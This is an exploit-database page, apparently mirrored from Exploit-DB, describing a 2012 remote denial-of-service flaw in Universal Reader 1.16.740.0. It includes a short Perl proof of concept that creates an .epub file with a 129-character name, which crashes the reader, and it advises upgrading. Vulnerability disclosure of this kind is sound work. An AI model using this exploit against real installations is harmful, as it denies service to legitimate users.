header-logo
Suggest Exploit
vendor:
Universal Reader
by:
SecurityFocus
7,5
CVSS
HIGH
Remote Denial of Service
400
CWE
Product Name: Universal Reader
Affected Version From: 1.16.740.0
Affected Version To: 1.16.740.0
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2012

Universal Reader Remote Denial of Service Vulnerability

Universal Reader is prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to crash the affected application, denying service to legitimate users. Universal Reader 1.16.740.0 is vulnerable; other versions may also be affected. The exploit code creates a file with 129 'a's in the filename, which causes the application to crash.

Mitigation:

Upgrade to the latest version of Universal Reader to mitigate this vulnerability.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/53508/info

Universal Reader is prone to a remote denial-of-service vulnerability.

An attacker can exploit this issue to crash the affected application, denying service to legitimate users.

Universal Reader 1.16.740.0 is vulnerable; other versions may also be affected. 

#!/usr/bin/perl -w
$filename="a"x129;
print "------Generate testfile \"a\"x129.epub------\n";
open(TESTFILE, ">$filename.epub");
sleep(3);
close(TESTFILE);
print "------Complete!------\n";
exit(1);

Navigation

Suggest Exploit

Services By CQR